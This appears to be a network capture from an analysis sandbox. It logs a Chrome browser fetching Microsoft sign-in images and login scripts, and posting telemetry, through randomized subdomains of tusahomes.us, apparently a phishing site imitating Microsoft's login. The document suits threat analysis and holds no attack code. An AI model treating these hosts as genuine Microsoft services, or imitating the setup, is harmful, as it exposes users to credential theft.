                                                                2025-04-09 00:19:21 UTC3627INData Raw: 65 32 34 0d 0a 47 49 46 38 39 61 60 01 03 00 f0 00 00 00 00 00 69 69 69 21 f9 04 09 05 00 00 00 21 fe 26 45 64 69 74 65 64 20 77 69 74 68 20 65 7a 67 69 66 2e 63 6f 6d 20 6f 6e 6c 69 6e 65 20 47 49 46 20 6d 61 6b 65 72 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 1f 69 19 07 ec 96 8a b2 51 34 af de bc fb 0f 86 e2 48 96 e6 89 a6 6a 0a 3d 99 6b 39 2d 35 5f f5 8a e7 fa ce f7 fe 0f 8c b4 6a 37 98 a6 28 7b 05 97 cc a6 f3 09 d5 15 00 00 21 f9 04 09 03 00 00 00 2c 00 00 00 00 60 01 03 00
                                                                Data Ascii: e24GIF89a`iii!!&Edited with ezgif.com online GIF maker!NETSCAPE2.0,`6PlHI:qJk`BYL*&!,`9iQ4Hj=k9-5_j7({!,`
                                                                2025-04-09 00:19:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                46192.168.2.549766137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:21 UTC528OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                                                Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Sec-Fetch-Storage-Access: active
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
                                                                2025-04-09 00:19:23 UTC806INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:23 GMT
                                                                Content-Type: image/svg+xml
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cache-control: public, max-age=31536000
                                                                last-modified: Wed, 24 May 2023 10:11:46 GMT
                                                                etag: 0x8DB5C3F47E260FD
                                                                x-ms-request-id: cf27e4cf-001e-004c-7c16-a824d9000000
                                                                x-ms-version: 2009-09-19
                                                                x-ms-lease-status: unlocked
                                                                x-ms-blob-type: BlockBlob
                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                access-control-allow-origin: *
                                                                x-azure-ref: 20250409T001923Z-1686b48456f2txbhhC1SJCv5sc0000000cg000000000fd1p
                                                                x-fd-int-roxy-purgeid: 4554691
                                                                x-cache: TCP_HIT
                                                                accept-ranges: bytes
                                                                content-encoding: gzip
                                                                2025-04-09 00:19:23 UTC15INData Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 ff 0d 0a
                                                                Data Ascii: a
                                                                2025-04-09 00:19:23 UTC670INData Raw: 32 39 37 0d 0a b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41 b9 75 c8 c2 62
                                                                Data Ascii: 297Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9!9Aub
                                                                2025-04-09 00:19:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                47192.168.2.549767137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:21 UTC529OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                                                Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Sec-Fetch-Storage-Access: active
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
                                                                2025-04-09 00:19:23 UTC806INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:23 GMT
                                                                Content-Type: image/svg+xml
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cache-control: public, max-age=31536000
                                                                last-modified: Wed, 24 May 2023 10:11:48 GMT
                                                                etag: 0x8DB5C3F4911527F
                                                                x-ms-request-id: 4b2fbbe6-401e-006a-78fe-a31b7e000000
                                                                x-ms-version: 2009-09-19
                                                                x-ms-lease-status: unlocked
                                                                x-ms-blob-type: BlockBlob
                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                access-control-allow-origin: *
                                                                x-azure-ref: 20250409T001923Z-1686b48456fhfv79hC1SJCpn9w0000000d20000000008vqf
                                                                x-fd-int-roxy-purgeid: 4554691
                                                                x-cache: TCP_HIT
                                                                accept-ranges: bytes
                                                                content-encoding: gzip
                                                                2025-04-09 00:19:23 UTC15INData Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 ff 0d 0a
                                                                Data Ascii: a
                                                                2025-04-09 00:19:23 UTC1432INData Raw: 35 39 31 0d 0a bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5 62 55 12 3b 0e
                                                                Data Ascii: 591WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]hbU;
                                                                2025-04-09 00:19:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                48192.168.2.549768137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:22 UTC760OUTGET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1
                                                                Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: same-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Referer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
                                                                2025-04-09 00:19:25 UTC800INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:25 GMT
                                                                Content-Type: image/svg+xml
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cache-control: public, max-age=31536000
                                                                last-modified: Wed, 24 May 2023 10:11:49 GMT
                                                                etag: 0x8DB5C3F49ED96E0
                                                                x-ms-request-id: 746a8cf5-c01e-0021-69af-a59092000000
                                                                x-ms-version: 2009-09-19
                                                                x-ms-lease-status: unlocked
                                                                x-ms-blob-type: BlockBlob
                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                access-control-allow-origin: *
                                                                x-azure-ref: 20250409T001924Z-1686b48456f92q2khC1SJC3zv00000000cmg00000000ds9n
                                                                x-fd-int-roxy-purgeid: 0
                                                                x-cache: TCP_HIT
                                                                accept-ranges: bytes
                                                                content-encoding: gzip
                                                                2025-04-09 00:19:25 UTC15INData Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 ff 0d 0a
                                                                Data Ascii: a
                                                                2025-04-09 00:19:25 UTC618INData Raw: 32 36 33 0d 0a 7d 55 4d 6f 22 31 0c fd 2b a3 d9 ab 93 c9 f7 47 3b 20 cd 9e 38 6c af 1c b8 4d 0b 05 24 0a 55 19 41 57 ab fe f7 b5 93 a0 55 61 58 0d d8 60 27 ef 3d db 09 b4 c7 d3 ba fa 7c db ed 8f 93 7a 33 0c ef 0f 4d 73 3e 9f f9 59 f3 c3 c7 ba 51 42 88 06 57 d4 d5 79 bb 1c 36 93 da 84 ba da ac b6 eb cd 90 3f 9f b6 ab f3 cf c3 e7 a4 16 95 a8 4c c0 57 3d 6d 97 ab d7 e3 b4 3d 0e bf 77 ab 29 ef ff bc 6e 77 bb 87 fd 61 bf 7a fc e2 cf f9 db 0f 23 e8 79 fc 6a 9b bc ac 6d f2 a6 8f d5 cb 50 bd ec fa 23 ca e9 ef b1 36 d3 f6 bd 1f 36 97 75 cf 75 b5 9c d4 4f 46 80 56 dc fa 30 37 62 a6 d5 5c bb 99 0a 73 ad 66 ca cc 55 e0 de b9 4e 0a ee 42 84 e2 04 3e 12 64 04 2d 7a 0c a5 78 89 32 cb ad f1 4c 72 0b 52 72 29 dc c5 e5 ac e2 4a 46 cc 7a 19 3b 4c 68 af a1 b8 8c 19 71 9f 32
                                                                Data Ascii: 263}UMo"1+G; 8lM$UAWUaX`'=|z3Ms>YQBWy6?LW=m=w)nwaz#yjmP#66uuOFV07b\sfUNB>d-zx2LrRr)JFz;Lhq2
                                                                2025-04-09 00:19:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                49192.168.2.549769137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:22 UTC721OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4f75990aeef30238698e.js HTTP/1.1
                                                                Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: */*
                                                                Sec-Fetch-Site: same-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Referer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
                                                                2025-04-09 00:19:25 UTC812INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:25 GMT
                                                                Content-Type: application/x-javascript
                                                                Content-Length: 35231
                                                                Connection: close
                                                                cache-control: public, max-age=31536000
                                                                last-modified: Wed, 19 Mar 2025 22:11:53 GMT
                                                                etag: 0x8DD67330E362146
                                                                x-ms-request-id: 75b7fea6-401e-002f-649c-a7b922000000
                                                                x-ms-version: 2009-09-19
                                                                x-ms-lease-status: unlocked
                                                                x-ms-blob-type: BlockBlob
                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                access-control-allow-origin: *
                                                                x-azure-ref: 20250409T001924Z-1686b48456fw7rrmhC1SJCw99w0000000d1g00000000bp9e
                                                                x-fd-int-roxy-purgeid: 4554691
                                                                x-cache: TCP_HIT
                                                                accept-ranges: bytes
                                                                content-encoding: gzip
                                                                2025-04-09 00:19:25 UTC15572INData Raw: 1f 8b 08 00 00 00 00 00 00 ff c4 bd 6b 43 db 48 b2 30 fc fd f9 15 e0 9d 65 ac b5 00 df 30 18 70 58 06 92 49 76 33 93 9c 5c 66 cf 2e 30 59 59 96 6d 0d b2 65 24 99 4b 02 cf 6f 7f eb d2 97 6a c9 90 cc 9c 67 df 33 e7 6c 70 57 df aa ab ab ab ab aa ab 5b db 7f 59 ff 3f 6b 7f 59 db fc f6 ff d6 de 7f 38 7e f7 61 ed cd 8b b5 0f 2f 5f bd 3b 5d 7b 0b a9 7f ae fd fc e6 c3 ab 93 e7 df de 0e 76 8a ff fb 30 8d f3 b5 71 9c 44 6b f0 77 18 e4 d1 68 2d 9d af a5 d9 5a 3c 0f d3 6c 91 66 41 11 e5 6b 33 f8 37 8b 83 64 6d 9c a5 b3 b5 62 1a ad 2d b2 f4 b7 28 2c f2 b5 24 ce 0b a8 34 8c 92 f4 66 ad 0e cd 65 a3 b5 b7 41 56 dc ad bd 7a eb 6d 41 fb 11 b4 16 4f e2 39 d4 0e d3 c5 1d fc 9e 16 6b f3 b4 88 c3 68 2d 98 8f a8 b5 04 12 f3 3c 5a 5b ce 47 51 b6 76 33 8d c3 e9 da 4f 71 98 a5 79
                                                                Data Ascii: kCH0e0pXIv3\f.0YYme$Kojg3lpW[Y?kY8~a/_;]{v0qDkwh-Z<lfAk37dmb-(,$4feAVzmAO9kh-<Z[GQv3Oqy
                                                                2025-04-09 00:19:25 UTC16384INData Raw: db aa df dc 77 71 b6 63 d9 3e 3b bf 3d 3e 3d 5f 36 7b cd e6 26 fd c1 87 21 7b ad 13 fc f7 14 33 76 9b 2f e0 df bd e7 ed f3 65 6b af f9 9c 1c 62 3f 6c d2 9f 17 f8 6f fb 98 12 6d ca e9 35 29 c1 8f fd f5 7a 9c 80 62 2f 9e bf c0 7f 5f bc e8 6f d2 9f 1f 2e ee cf 97 a7 60 28 9c c1 9f 93 1f 4e f1 df 93 53 06 b6 5f 10 f0 18 9b 82 3f 1d 86 76 a8 e8 e9 6e 67 93 fe 1c 13 f4 87 6e 93 ca 36 5b f8 6f 9b 6b ec be b8 d8 a6 51 b7 be 46 54 9a 87 d7 f1 fc f2 75 30 8c 12 a6 23 6e 83 36 e3 34 ca 8b 78 4e 8f 36 70 76 c7 c9 fe 10 17 49 c4 19 5d a6 74 fb f7 1b 06 d6 3f 68 0c 77 dc a3 42 52 c6 f3 9f 82 5b 50 f6 e8 27 89 62 fa 35 40 0b 7d 3e 68 1d 50 ea 30 3c 20 36 ec 77 40 f6 83 82 01 ec 9d 85 52 ae 52 29 dc ca d0 7b b8 b9 39 f7 be e0 f6 ae 24 18 54 8c b9 7d 60 f1 d9 08 64 02 be
                                                                Data Ascii: wqc>;=>=_6{&!{3v/ekb?lom5)zb/_o.`(NS_?vngn6[okQFTu0#n64xN6pvI]t?hwBR[P'b5@}>hP0< 6w@RR){9$T}`d
                                                                2025-04-09 00:19:25 UTC3275INData Raw: fd 51 33 84 89 2e d8 6f 8b e7 42 25 ca 37 53 f2 61 c4 a9 47 ea 4e 32 9a 86 4c b8 b8 2b cf ae f0 c7 ed 89 6a 85 d1 2c a8 f8 e2 22 da c0 27 eb ce 2b 33 96 1f 3c fe 7b 00 71 55 d1 6f bf 03 94 58 d8 0f 6b 78 bb 39 2c ab a4 86 3d c8 a3 e2 01 05 0d c4 26 a1 cd 18 49 39 57 d2 d6 7e bd ed 62 ce eb 60 6b b9 5d 59 8d fb f5 a4 c4 a3 4a c7 71 d6 19 ea 20 34 15 88 bf 04 4f 68 f9 00 b3 a9 cc ee d6 96 fb a0 f0 c8 cb 08 23 03 42 d9 bf 93 11 ef 76 c6 31 dd 04 74 17 59 b4 f2 ce 4e 97 0b be f1 16 df 4e 16 7b 43 26 b9 39 66 4f 96 f7 0e 9c 1d 0e 9d 84 39 99 5a ed 0d 15 4f ac 47 8f 94 52 24 25 94 e2 37 fa 20 f1 ca ea 72 9d 15 10 94 a9 b5 e2 1c cd ac f1 97 6a fb da ac 35 2a d5 0a d3 54 08 e1 f5 6a ab c1 c2 eb 35 5d 6f 60 38 bd 0c 9f 9b ec f7 02 ef 04 f0 ab 9a 08 61 99 75 ca d8
                                                                Data Ascii: Q3.oB%7SaGN2L+j,"'+3<{qUoXkx9,=&I9W~b`k]YJq 4Oh#Bv1tYNN{C&9fO9ZOGR$%7 rj5*Tj5]o`8au


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                50192.168.2.549772137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:25 UTC750OUTOPTIONS /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0 HTTP/1.1
                                                                Host: ab52444af96f49b7b110b6e3700ca950.tusahomes.us
                                                                Connection: keep-alive
                                                                Accept: */*
                                                                Access-Control-Request-Method: POST
                                                                Access-Control-Request-Headers: apikey,cache-control,client-id,client-version,content-type,time-delta-to-apply-millis,upload-time
                                                                Origin: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Site: same-site
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-04-09 00:19:27 UTC722INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:27 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 0
                                                                Connection: close
                                                                cache-control: public, 3600
                                                                access-control-allow-credentials: true
                                                                access-control-allow-headers: AuthMsaDeviceTicket,AuthXToken,Content-Encoding,Content-Type,Cache-Control,Client-Id,SDK-Name,sdk-version,apikey,x-apikey,client-version,upload-time,time-delta-to-apply-millis,client-time-epoch-millis,persistence-mode,reliability-mode,NoResponseBody
                                                                access-control-max-age: 3600
                                                                access-control-allow-origin: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us
                                                                set-cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75; Domain=tusahomes.us; HttpOnly; Path=/; SameSite=none; Secure


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                51192.168.2.549774137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:25 UTC529OUTGET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1
                                                                Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Sec-Fetch-Storage-Access: active
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
                                                                2025-04-09 00:19:27 UTC800INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:27 GMT
                                                                Content-Type: image/svg+xml
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cache-control: public, max-age=31536000
                                                                last-modified: Wed, 24 May 2023 10:11:49 GMT
                                                                etag: 0x8DB5C3F49ED96E0
                                                                x-ms-request-id: 746a8cf5-c01e-0021-69af-a59092000000
                                                                x-ms-version: 2009-09-19
                                                                x-ms-lease-status: unlocked
                                                                x-ms-blob-type: BlockBlob
                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                access-control-allow-origin: *
                                                                x-azure-ref: 20250409T001927Z-1686b48456f4bbfvhC1SJC1f840000000csg00000000dc00
                                                                x-fd-int-roxy-purgeid: 0
                                                                x-cache: TCP_HIT
                                                                accept-ranges: bytes
                                                                content-encoding: gzip
                                                                2025-04-09 00:19:27 UTC15INData Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 ff 0d 0a
                                                                Data Ascii: a
                                                                2025-04-09 00:19:27 UTC618INData Raw: 32 36 33 0d 0a 7d 55 4d 6f 22 31 0c fd 2b a3 d9 ab 93 c9 f7 47 3b 20 cd 9e 38 6c af 1c b8 4d 0b 05 24 0a 55 19 41 57 ab fe f7 b5 93 a0 55 61 58 0d d8 60 27 ef 3d db 09 b4 c7 d3 ba fa 7c db ed 8f 93 7a 33 0c ef 0f 4d 73 3e 9f f9 59 f3 c3 c7 ba 51 42 88 06 57 d4 d5 79 bb 1c 36 93 da 84 ba da ac b6 eb cd 90 3f 9f b6 ab f3 cf c3 e7 a4 16 95 a8 4c c0 57 3d 6d 97 ab d7 e3 b4 3d 0e bf 77 ab 29 ef ff bc 6e 77 bb 87 fd 61 bf 7a fc e2 cf f9 db 0f 23 e8 79 fc 6a 9b bc ac 6d f2 a6 8f d5 cb 50 bd ec fa 23 ca e9 ef b1 36 d3 f6 bd 1f 36 97 75 cf 75 b5 9c d4 4f 46 80 56 dc fa 30 37 62 a6 d5 5c bb 99 0a 73 ad 66 ca cc 55 e0 de b9 4e 0a ee 42 84 e2 04 3e 12 64 04 2d 7a 0c a5 78 89 32 cb ad f1 4c 72 0b 52 72 29 dc c5 e5 ac e2 4a 46 cc 7a 19 3b 4c 68 af a1 b8 8c 19 71 9f 32
                                                                Data Ascii: 263}UMo"1+G; 8lM$UAWUaX`'=|z3Ms>YQBWy6?LW=m=w)nwaz#yjmP#66uuOFV07b\sfUNB>d-zx2LrRr)JFz;Lhq2
                                                                2025-04-09 00:19:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                52192.168.2.549776137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:27 UTC1066OUTPOST /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0 HTTP/1.1
                                                                Host: ab52444af96f49b7b110b6e3700ca950.tusahomes.us
                                                                Connection: keep-alive
                                                                Content-Length: 1734
                                                                sec-ch-ua-platform: "Windows"
                                                                cache-control: no-cache, no-store
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Client-Id: NO_AUTH
                                                                upload-time: 1744157963746
                                                                time-delta-to-apply-millis: use-collector-delta
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                content-type: application/x-json-stream
                                                                client-version: 1DS-Web-JS-3.2.6
                                                                apikey: 69adc3c768bd4dc08c19416121249fcc-66f1668a-797b-4249-95e3-6c6651768c28-7293
                                                                Accept: */*
                                                                Origin: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us
                                                                Sec-Fetch-Site: same-site
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
                                                                2025-04-09 00:19:27 UTC1734OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 49 44 55 58 5f 45 53 54 53 43 6c 69 65 6e 74 54 65 6c 65 6d 65 74 72 79 45 76 65 6e 74 5f 57 65 62 57 61 74 73 6f 6e 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 34 2d 30 39 54 30 30 3a 31 39 3a 32 31 2e 37 31 32 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 36 39 61 64 63 33 63 37 36 38 62 64 34 64 63 30 38 63 31 39 34 31 36 31 32 31 32 34 39 66 63 63 22 2c 22 65 78 74 22 3a 7b 22 61 70 70 22 3a 7b 22 76 65 72 22 3a 22 32 2e 31 2e 32 30 35 34 30 2e 32 22 2c 22 6e 61 6d 65 22 3a 22 49 44 55 58 5f 45 53 54 53 43 6c 69 65 6e 74 54 65 6c 65 6d 65 74 72 79 45 76 65 6e 74 5f 57 65 62 57 61 74 73 6f 6e 22 2c 22 73 65 73 49 64 22 3a 22 62 71 70 73 44 55 35 66 6f 55 4f 76 71 5a 34 77 76 71 76 70 6c 4b 22
                                                                Data Ascii: {"name":"IDUX_ESTSClientTelemetryEvent_WebWatson","time":"2025-04-09T00:19:21.712Z","ver":"4.0","iKey":"o:69adc3c768bd4dc08c19416121249fcc","ext":{"app":{"ver":"2.1.20540.2","name":"IDUX_ESTSClientTelemetryEvent_WebWatson","sesId":"bqpsDU5foUOvqZ4wvqvplK"
                                                                2025-04-09 00:19:30 UTC559INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:30 GMT
                                                                Content-Type: application/json
                                                                Content-Length: 153
                                                                Connection: close
                                                                p3p: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                time-delta-millis: 6007
                                                                access-control-allow-headers: P3P,Set-Cookie,time-delta-millis
                                                                access-control-allow-methods: POST
                                                                access-control-allow-credentials: true
                                                                access-control-allow-origin: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us
                                                                access-control-expose-headers: time-delta-millis
